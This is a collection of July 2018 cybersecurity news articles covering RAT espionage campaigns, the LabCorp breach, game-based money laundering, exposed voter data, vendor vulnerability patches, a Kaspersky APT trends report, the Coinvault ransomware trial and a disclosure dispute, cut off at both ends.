“In addition, human drivers are in the loop of the attack, which makes a stealthy attack necessary.”

Experts highlighted that the spoofing attacks could be very effective, 40 volunteer drivers involved in a trial found that 95 per cent of the time the attackers were able to trick the targets into following the fake routes.

Such kind of attacks could be particularly dangerous especially when dealing with self-driving cars and trucks.

Researchers provided also countermeasures to prevent the attacks such as the use of encrypted data also for civilian GPS signals.

Cyber espionage campaign targets Samsung service centers in Italy
19.7.2018 securityaffairs CyberSpy

Security researchers from Italian security firm TG Soft have uncovered an ongoing malware campaigns targeting Samsung service centers in Italy.
“TG Soft’s Research Centre (C.R.A.M.) has analyzed the campaign of spear-phishing on 2 april 2018 targeting the service centers of Samsung Italy.” reads the analysis published by TG Soft.

“The campaign analyzed is targeting only the service centers of Samsung Italy, it’s an attack multi-stage and we have monitored it until July 2018″
The campaign has similarities with the attacks campaigns that targeted similar electronics service centers in Russia that was discovered by Fortinet in June. The attackers’ motivation is still unclear, experts explained that the malicious code is not particularly sophisticated.

The attackers used spear-phishing emails sent to Samsung Italy service center workers. The messages have attached weaponized Excel documents.

The documents trigger the CVE-2017-11882 Office Equation Editor vulnerability to infect users.
According to a technical report published by the experts, this attack and the one against Russian service centers offering maintenance and support for various electronic goods started in the same period, in March.

While Russian service centers were hit by the Imminent Monitor RAT, the attacks on Samsung Italy service centers also involved other RATs, such Netwire and njRAT.

The quality of the spear phishing messages was high in both campaigns, they appear to have been written by a native in Italian and Russian, respectively.

The attachment used in this campaign is an Excel document titled “QRS non autorizzati.xlsx,” while the phishing messages are signed with the name of the Samsung IT Service Manager, a real employee of Samsung Italia, and includes the email and phone numbers of the employee.

Samsung service centers

At the time, the experts were not able to attribute the attack to a specific threat actor. The electronics service centers appear not particularly interesting for attackers because the volume of data it manage is little.

Probably the attackers want to compromise remote management tools used by these services in order to gain control over the computers of the customers that request support to the electronics service centers.

“Command and control servers use services like noip.me or ddns.net, which in combination with a VPN, allow hiding the IP address of the server where the exfiltrated data is sent.” concludes the report.
“During the analysis in some cases, the C2 servers were not online and the RAT failed to contract them, and then returns active after a few tens of hours with a new IP address.
The actors behind this attack remain unknown …”

The Italian version of the report that includes also the IoCs is available here.

QUASAR, SOBAKEN AND VERMIN RATs involved in espionage campaign on Ukraine
19.7.2018 securityaffairs

Security experts from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions and involving three different RATs, including the custom-made VERMIN.
Security researchers from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions, attackers used at least three different remote access Trojans (RATs).

The campaign was first spotted in January by experts from PaloAlto Networks when the researchers discovered a new piece of malware tracked VERMIN RAT targeting Ukraine organizations.

“Pivoting further on the initial samples we discovered, and their infrastructure, revealed a modestly sized campaign going back to late 2015 using both Quasar RAT and VERMIN.” reads the report from PaloAlto Networks.


Back to the present, the experts discovered that the attackers used several RATs to steal sensitive documents, the researchers collected evidence of the involvement of the Quasar RAT, Sobaken RAT, and Vermin.

The Quasar RAT is available for free on GitHub, many other attackers used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats. Sobaken is an improved version of Quasar RAT, that includes several anti-sandbox and other evasion mechanisms.

The RATs have been used against different targets at the same time, experts noticed they share some infrastructure and connect to the same C&C servers.


The threat actors don’t have advanced skills, their attack vector is spear phishing messages and they have been quite successful in using social engineering to lure victims into opening the email and downloading and executing the malicious codes.

“Even though these threat actors don’t seem to possess advanced skills or access to 0-day vulnerabilities, they have been quite successful in using social engineering to both distribute their malware and fly under the radar for extended periods of time.” Reads the analysis published by ESET.

“We were able to trace attacker activity back to October 2015; however, it is possible that the attackers
have been active even longer. These attackers use three different .NET malware strains in their attacks – Quasar RAT, Sobaken (a RAT derived from Quasar) and a custom-made RAT called Vermin. All three malware strains have been in active use against different targets at the same time, they share some infrastructure and connect to the same C&C servers.”

Some emails carried weaponized Word documents attempting to exploit CVE-2017-0199, attackers used a dropper masquerades as a legitimate software (i.e. Adobe, Intel or Microsoft) to deliver the final payload.

The threat actors used a scheduled task that executes the malware every 10 minutes to achieve persistence on the infected machine.

“The installation procedure is the same for all three malware strains used by these attackers. A dropper drops a malicious payload file (Vermin, Quasar or Sobaken malware) into the %APPDATA% folder, in a subfolder named after a legitimate company (usually Adobe, Intel or Microsoft).” continues the report.

“Then it creates a scheduled task that runs the payload every 10 minutes to ensure its persistence.”

Since mid-2017, the threat actors adopted steganography to bypass content filtering by hiding the payloads in images that were hosted on the free image hosting websites saveshot.net and ibb.co.

The malicious code executed only on hosts where the Russian or Ukrainian keyboard layouts are installed, it also checks the IP address and the username on the target machine.

To avoid automated analysis systems, that often use tools like Fakenet-NG where all DNS/HTTP communication succeeds and returns some result, the malware generates a random
website name/URL and attempt to connect it. If the connection fails in some cases the system could be considered real and not a virtualized environment used by researchers.

“Among the many different malware attacks targeted at high value assets in Ukraine, these attackers haven’t received much public attention – perhaps because of their initial use of open-source-based malware before developing their own strain (Vermin).” concludes the report.

“Employing multiple malware families, as well as various infection mechanisms – including common social engineering techniques but also not-so-common steganography – over the past three years, could be explained by the attackers simply experimenting with various techniques and malware, or it may suggest operations by multiple subgroups.”

Further details on the campaign, including the IoCs are included in the report.

US Biggest Blood Testing Laboratories LabCorp suffered a security breach
19.7.2018 securityaffairs Incindent

Hackers have breached the network at LabCorp, one of the largest diagnostic blood testing laboratories in the US, millions of Americans potentially at risk.
The biggest blood testing laboratories network in the US, LabCorp has suffered a security breach. The company announced the incident on Monday, the security breach occurred over the weekend.

The hackers breached into the LabCorp Diagnostic systems, but the company says there’s no indication that attackers compromised also the systems used by its drug development business Covance.

“At this time, there is no evidence of unauthorized transfer or misuse of data. LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation,” it said, in its statement.

LabCorp did not share further details about the security breach, in response to the incident the company shut down part of its infrastructure.

“LabCorp immediately took certain systems offline as part of its comprehensive response to contain the activity,” the firm said in a 8-K filed with the Securities and Exchange Comission.

“This temporarily affected test processing and customer access to test results over the weekend. Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed today, and we anticipate that additional systems and functions will be restored through the next several days,”

Biggest Blood Testing Laboratories LabCorp
Mike Thomas, a technologist at LabCorp, works with patient samples at the company’s location in Burlington. JULIE KNIGHT – Source www.bizjournals.com

The company is currently testing operations that have been resumed, other suctions will be fully restored in the next days, meantime some customers may face brief delays.

“We anticipate that additional systems and functions will be restored throughout the next several days,” it added. “Some customers of LabCorp Diagnostics may experience brief delays in receiving results as we complete that process.”

The hack might have severe consequences for millions of Americans due to the potential extent of the breached networks that connects thousands of hospitals and testing facility offices worldwide.

How crooks conduct Money Laundering operations through mobile games
19.7.2018 securityaffairs Mobil

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.
A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice, the investigation started in mid-June when the experts from Kromtech Security discovered a MongoDB database exposed online. The database was containing information related to carders’ activities, the database contained 150,833 unique cards records (card number, expiration date, and CCV)

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is simple as effective. Crooks used a special tool to create iOS accounts using valid emails accounts, then they associated with the accounts the stolen payment cards. Most of the created accounts are specific to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then made the jailbreaking of iOS devices to install various games, create in-game accounts, and use them to purchase game features or premiums.

The cash out was made later when crooks re-sold the game features or premiums online for real money.

Experts found credit cards belong to 19 different banks, they speculated they were probably bought on the specific carder markets where they were offered in groups of 10k, 20k, 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a gaming community of over 250 million users and generate approximately $330 million USD a year in revenue. Associated third-party markets are very active, websites like g2g.com to allow gamers to buy and sell resources and games, a great opportunity for crooks involved in money laundering.

money laundering games

“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

App Offered by Android Users Release Metacritic score In-app Products price per item Daily revenue $
Yearly revenue

Clash of Clans Supercell 100 000 000+ 2012 74/100 $0.99 – $99.99 per item 684 002 250M
Clash Royale Supercell 100 000 000+ 2016 86/100 $0.99 – $99.99 per item 153 150 56M
Marvel Contest of Champions Kabam 50 000 000+ 2014 76/100 $0.99 – $99.99 per item 64 296 23.5M
The experts also found that the Apple was employing lax credit card verification process when users add payment card data to iOS accounts, advantaging fraudulent activities. The experts noticed that cards with improper names and addresses were approved by Apple, for this reason, they notified their discovery to Apple.

The experts also highlighted that game makers do not implement necessary measures to prevent such kind of abuses. For example, the game makers do not control the interaction of tools like Racoonbot with Supercell games that are used to automate the premium feature buying operations.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans. It advertises itself in it’s forum as a way to “Become rich at Clash of the Clans”. This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards. It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

“iGameSupply is an approved marketplace for selling Racoonbot generated gems https://www.raccoonbot.com/forum/forum/80-approved-marketplace/“

Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.2018 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company database exposed online. The expert was using the online service GrayhatWarfare that could be used to search publicly exposed Amazon Web Services data storage buckets.

The company offers for sale voter records for a price of 3¢/record, the same data that left exposed online.

Querying the system for the term “voters” he found the AWS bucket used by RoboCent.

The bucked discovered by the expert contained 2,584 files, exposed voters’ data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education
RoboCent exposed data

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered a massive US voter data online, apparently being part of Robocent, Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company that quickly secured the bucket, below the message sent by a developer of the company that solved the issue.

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of unsecured Amazon S3 buckets exposed online, in June 2017 DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.

In December 2017, Diachenko discovered another an exposed MongoDB database containing voter registration data for more than 19 million California residents.

Okta Acquires Access Control Startup ScaleFT
19.7.2018 securityweek  IT   

Enterprise identity management firm Okta this week announced that it has acquired ScaleFT, a company that offers a Zero Trust access control platform.

Okta provides a Single Sign-On (SSO) solution to help customers efficiently manage user accounts across the enterprise and eliminate passwords while simplifying access. With Multi-factor Authentication (MFA), it provides strong authentication various services, with over 5,500 pre-built integrations to applications and infrastructure providers.

Okta Logo

Founded in 2015, ScaleFT’s access management platform was inspired by Google’s BeyondCorp security model, which provides remote access without the use of a VPN (virtual private network).

With this acquisition, publicly traded Okta (NASDAQ:OKTA), which already helps over 4,700 organizations both secure and manage their extended enterprise, plans to bring Zero Trust to corporations with a framework to protect sensitive data without compromising on experience.

By combining ScaleFT’s Zero Trust platform with its own Identity Cloud, Okta aims to help organizations easily validate users, devices, application and network information while also securing access to data from cloud to ground.

“Companies have realized they can no longer trust their network and have to understand device security — instead of trusting everyone behind a firewall, now IT and security leaders must trust no one, inside or outside the organization,” Frederic Kerrest, Chief Operating Officer and co-founder, Okta, said.

“To help our customers increase security while also meeting the demands of the modern workforce, we’re acquiring ScaleFT to further our contextual access management vision — and ensure the right people get access to the right resources for the shortest amount of time,” Kerrest continued.

The Zero Trust security paradigm requires organizations to move away from the traditional approach of perimeter-based security that included static credentials and access controls, and to focus on adaptive and context-aware controls instead, for making continuous access decisions.

Following the acquisition, ScaleFT CEO and co-founder Jason Luce will manage the transition, while CTO and co-founder Paul Querna will lead strategy and execution of Okta's Zero Trust architecture. Marc Rogers, CSO, will join Okta as Executive Director, Cybersecurity Strategy.

Cisco Finds Serious Flaws in Policy Suite, SD-WAN Products
19.7.2018 securityweek 

Cisco informed customers on Wednesday that it has found and patched over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The networking giant reported discovering four critical flaws in Policy Suite during internal testing. Two of these security holes are unauthenticated access issues that allow a remote attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Once they gain access to the Policy Builder interface, which is exposed due to a lack of authentication, attackers can make changes to existing repositories and create new repositories. The OSGi interface allows an attacker to access or change any file accessible by the OSGi process.

The lack of an authentication mechanism also exposes the Policy Builder database, allowing an attacker to access and change any data stored in it.

Cisco also discovered that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can log in to this account and execute arbitrary commands with root privileges.

These critical Policy Suite vulnerabilities are tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376 and CVE-2018-0377.

Cisco has also fixed a total of seven flaws in its SD-WAN solution. The only one of these vulnerabilities that can be exploited remotely without authentication impacts the Zero Touch Provisioning service and it allows an attacker to cause a denial-of-service (DoS) condition.

The other SD-WAN security holes, which require authentication, can be exploited to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges. One of the SD-WAN bugs requires both authentication and local access for exploitation.

Cisco also informed customers that its Nexus 9000 series Fabric switches, specifically their DHCPv6 feature, are impacted by a high severity flaw that can be exploited by a remote and unauthenticated attacker to cause a DoS condition.

The company has also assigned a high severity rating to multiple vulnerabilities affecting the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. The security bugs can be exploited for arbitrary code execution by getting the targeted user to open specially crafted ARF or WRF files using the affected player.

None of the vulnerabilities patched this week appear to have been exploited for malicious purposes.

ABB to Patch Code Execution Flaw in HMI Tool
19.7.2018 securityweek 

Swiss industrial tech company ABB is working on a patch for a serious arbitrary code execution vulnerability affecting one of its engineering tools.

The security hole, tracked as CVE-2018-10616, impacts all versions of Panel Builder 800. ABB’s Panel 800 devices provide operator panels for process automation systems, and the Panel Builder is an engineering tool for the process panels included in the product suite. According to ICS-CERT, which published an advisory this week, the tool is used worldwide in the chemical, critical manufacturing, dams, energy, water, and food and agriculture sectors.ABB Panel Builder 800 vulnerabilities

Researchers discovered that the HMI tool, specifically its file parser component, is affected by a high severity improper input validation flaw that can allow an attacker to run arbitrary code on the device hosting the affected utility.

A remote attacker can exploit the vulnerability for arbitrary code execution by tricking a local user into opening a specially crafted file. The weakness cannot be exploited without user interaction, ABB pointed out.

The vendor says it’s working on a patch. In the meantime, it has advised customers to ensure that their employees are aware of the threat posed by opening malicious files with the Panel Builder tool, to scan files transferred between devices, and avoid giving users more permissions than required for their job.

ABB Panel Builder 800 vulnerabilities

ABB says it’s not aware of any malicious exploits targeting this vulnerability and details of the security hole have not been publicly disclosed.

The vulnerability was reported to ABB by Michael DePlante of the Leahy Center for Digital Investigation at Champlain College and Michael Flanders of Trend Micro, both working with the Zero Day Initiative (ZDI).

ZDI lists over 30 upcoming advisories for vulnerabilities discovered by DePlante and Flanders in ABB products, and a majority have been assigned CVSS scores of 9.3, which puts them in the critical severity category. While there are more than 30 advisories, ZDI often publishes a separate advisory for each variation of a flaw, but vendors typically view them as a single issue and only one CVE identifier gets assigned to them.

APT Trends Report Q2 2018
19.7.2018 Kaspersky   APT
In the second quarter of 2017, Kaspersky Lab’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.

These summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity’s sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: intelreports@kaspersky.com.

Remarkable new findings
We are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.

In terms of well-known groups, Asian actors were the most active by far.

Lazarus/BlueNoroff was suspected of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a campaign against an online casino in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a warning in June about a new version of Manuscrypt they call TYPEFRAME.

Even if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.

Possibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft was found using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group’s capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day announced by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as DarkHotel.

The overlaps between Scarcruft and Darkhotel go back to 2016 when we discovered Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:

Operation Exploit Actor
Daybreak CVE-2016-4171 DarkHotel
Erebus CVE-2016-4117 Scarcruft
DarkHotel’s Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft’s Operation Erebus focused primarily on South Korea.

Analysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker was using URLMoniker to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim’s computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: “The King is Dead. Long Live the King!“.

We also observed some relatively quiet groups coming back with new activity. A noteworthy example is LuckyMouse (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.

Still, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an analysis on the EXIF to C2 mechanism used by this malware.

This campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.

Activity of well-known groups
It seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.

There is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we observed new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.

But even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.

One of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.

Newcomers and comebacks
Every now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.

One good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.

Following the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.

We also discovered a new low-sophistication set of activity we call Perfanly, which we couldn´t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.

Between June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.

Final thoughts
The combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the ‘Chinese-speaking umbrella’, as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.

The intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.

One interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries – some related to new relations with North Korea – held in Mongolia, and to the country’s new role in the region.

There were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking our latest analysis on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.

To recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn’t believe this was an important issue.

Coinvault, the court case
19.7.2018 Kaspersky Cryptocurrency 
Today, after almost 3 years of waiting, it was finally the day of the trial. In the Netherlands, where the whole case took place, the hearings are open to the public. Meaning anyone who is interested can visit. And it was quite busy. Because besides the suspects, their lawyers, the judges and the prosecutor there were also several members of the press, a sketch artist (to make a drawing of the suspects), several members of the Dutch police, a few victims and other people who were interested in the case.

The defence started by calling the public prosecution service “niet ontvankelijk” for one of the defendants, meaning they are not allowed to prosecute the case. As a reason there was given that one of the defendants was underage during some of the actions. However, all three of the judges also do cases concerning underaged defendants and after a quick consultation with each other they decided to continue.

The hearing was resumed with what the two brothers were accused of:

Breaking into computers;
Make other people’s work inaccessible;
Extortion of 1295 people.
For us it was quite interesting to understand how they came up with the number of 1295 people, because when we released our final decryption tool we had at least 14k keys. So most likely much more people were infected. In fact, we think a zero could be added to 1295 to give a more realistic view on the number of victims.

The judge then went on with was basically a summary of the case. What happened, why did they do certain things etc. We as researchers often guess about motives behind actions, but we can never be 100% certain until there is a confession of the criminal. One of such an example is the amount of ransom to pay. During the time this all took place the brothers wanted 1 bitcoin as a ransom, which was worth about 220 euro at the time. We always say that we believe ransomware criminals choose a relatively small amount to make it more attractive to pay. When the judge asked the same question they gave exactly this answer. Always good to see your theories being confirmed 🙂

Some other interesting facts were that the case file was too big to fit in a moving box, they made around 20k euro (10k each), they didn’t stop with making ransomware because of the technical challenges, they accepted the risk of C2 seizure and they didn’t really see the influence their actions had on the victims. One of the judges then asked how this was possible, because they had a helpdesk where victims could e-mail to in case they had problems. All their “helpdesk” replies were that the victims just had to pay. The answers they gave to the judge weren’t very convincing.

The suspects mentioned though they started the helpdesk because their malware had some implementation mistakes (files were encrypted twice for example). A consequence of this is that even today, despite releasing our decryption tool which has all the keys, some victims were not able to recover all of their files. There was even one victim who mentioned that he just deleted all of his files because he didn’t believe a decryption tool would come available.

Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path. When we worked with the police on this case they kindly asked us to remove that screenshot (which we did), so that the suspects didn’t realize they made a mistake. During the court case they mentioned that they read the blogpost and saw their name and they were on the edge of stopping their campaign, but ultimately decided not to.

It then continued with claims by victims who paid money to get their files back. One of the victims was interested in Bitcoin and decided to pay the ransom. However, he already had some bitcoins on his computer, which were stolen by the suspects (the software supported this functionality) and now he wanted his bitcoin back :). One other victim had his own company and this took place while he was on vacation. He wanted 5000 euro because the suspects ruined his vacation and with the 5000 euro he could go on vacation again.

Now it was time for the prosecutor: twelve months of jail time will all but three suspended. Effectively this comes down to three months – the time they already did * ⅔ = about two months of jail. The lawyers then requested (since they made a full confession, wanted to help the victims getting their files back, etc) many hours of community service. One of the reasons not request jail time was because: “Bitcryptor is not malware”. But BitCryptor was the follow up of Coinvault, different name for the same software. Nobody really understood the quote, except for the lawyer, since it was obvious malware and made some victims.

In two weeks, on the 26th of July at 13:00 CET we know the outcome.

Vulnerability or Not? Pen Tester Quarrels With Software Maker
19.7.2018 securityweek 

Security Industry Battles Over Testing Methods

Researcher Publishes PoC; Vendor Says it's Not a Vulnerability

A SpiderLabs security researcher has published details of what he considers to be a vulnerability in the RLM web application provided by Reprise Software. Reprise CEO Matt Christiano has told SecurityWeek, it is not a vulnerability.

RLM is the Reprise License Manager, described by Reprise as "a flexible and easy-to-use license manager with the power to serve enterprise users." The researcher is Adrian Pruteanu, security consultant with SpiderLabs at Trustwave.

During a penetration engagement, Pruteanu writes, "I was able to identify a critical vulnerability which allowed me to execute code on the server, eventually leading to full domain compromise. Regrettably, despite my best efforts, the vendor has refused to issue patches as they do not believe these findings to be vulnerabilities."

Christiano responded, "The issue described in the [SpiderLabs] article is certainly not a vulnerability, it is misuse of the product."

Pruteanu claims RLM allows users (and attackers) to read and write data to any file on disk provided RLM has access to it. By default, RLM's web server running on port 5054, does not require authentication. This allows an attacker to write malware to the user startup folder without administrator access and even if RLM.exe is running under a low-privilege user. If RLM.exe is privileged, the malware can be written to the All Users Startup folder.

Christiano retorts, "RLM does not require elevated permissions to perform any operation, and is designed to be run in a segregated, non-privileged account. To install the program as root/administrator is simply negligent. This is clearly documented."

Christiano goes on to state that port 5054 was assigned to RLM by IANA in 2008. Furthermore, he adds, "License server machines are rarely internet-facing, and when they are, port 5054 is not required for operation, and should not be enabled thru the company's firewall."

The researcher provides a full proof of concept (PoC) for his 'vulnerability'. He also located a cross-site scripting (reflected) vulnerability in the lf parameter of the /goform/edit_lf_get_data URL in RLM's web interface. RLM does not enforce POST for this URL and the payload can also be passed with a GET request.

What worries the researcher even more than the vulnerabilities themselves (vulnerabilities can be fixed through responsible disclosure) has been the vendor's support staff response to the disclosure. Pruteanu reports, "During our email correspondence the general theme could be wrapped up in the following quotes: 'We tell end users not to run the rlm server (which implements the web server) in privileged mode. There is no reason it needs to run with elevated privileges'."

Pruteanu's response is that users typically ignore best practices and leave pre-existing defaults untouched.

Reprise support continued, "We do not consider this a vulnerability, any more than vi or notepad are vulnerabilities. Of course, NO ONE should run the servers as root/administrator; if they do, they deserve what they get. They can, also, disable the web interface, or, if they want to run it, they can enable logins for it. So there are plenty of opportunities for an admin to prevent any file writing."

Christiano expanded on his support staff comments. He clearly sees the issue as user or installer security misconfiguration (#6 in OWASP's current Top Ten Web Application Risks) rather than a vulnerability. "SpiderLabs refused to identify the 'customer' with this 'problem', denying us the opportunity to review our ISV's installation procedures and correct them," he said.

Of course, SpiderLabs is almost certainly enjoined by customer NDAs not to mention it by name. "One could argue," continued Christiano, "that SpiderLabs cares less about solving the problem than they do about creating sensational headlines to generate more business. I am not arguing that, but one could."

The timeline for the researcher's attempted responsible disclosure is short and limited. Over the course of just 13 days in May 2018, the researcher claims that he disclosed the vulnerabilities; the vendor, he says, refused to accept they are vulnerabilities and refused to patch; the researcher encouraged the vendor to reconsider; and the vendor chose to discontinue communication. There was no route to escalate the issue beyond the support person; and Pruteanu feels he had no alternative but to go to public disclosure.

But Christiano refutes this. "We did correspond with SpiderLabs thru June 2018 (not May)," he told SecurityWeek, "and described the situation to them; we received no further reply from them until they provided you with this misleading information."

"The biggest problem we run into during the disclosure process," comments Pruteanu "is getting the disclosure in front of the correct audience. Even though these vendors are basically getting a free audit that helps them secure their products for their customers, we are often met with hostility simply because they are unsure how to handle the report. If you don't have the capability to support this process in house there are third party options like Bugcrowd."

Christiano replies, "It is not at all clear how [SpiderLabs] did their testing, or how the software was installed. Clearly, it was installed incorrectly. Finally, Reprise has never refused to address any security vulnerability in any of our products."

It comes down to whether 'allowing' misconfiguration is in itself a vulnerability. Pruteanu believes it is. Christiano believes it is not, and that software installers have a responsibility to configure applications in the way intended and advised.

Chicago-based data security and compliance solutions firm Trustwave was acquired by Singapore Telecommunications (Singtel) for $810 million in cash in April 2015.

Russia Targeted by Almost 25 Million Cyber-Attacks During World Cup: Putin
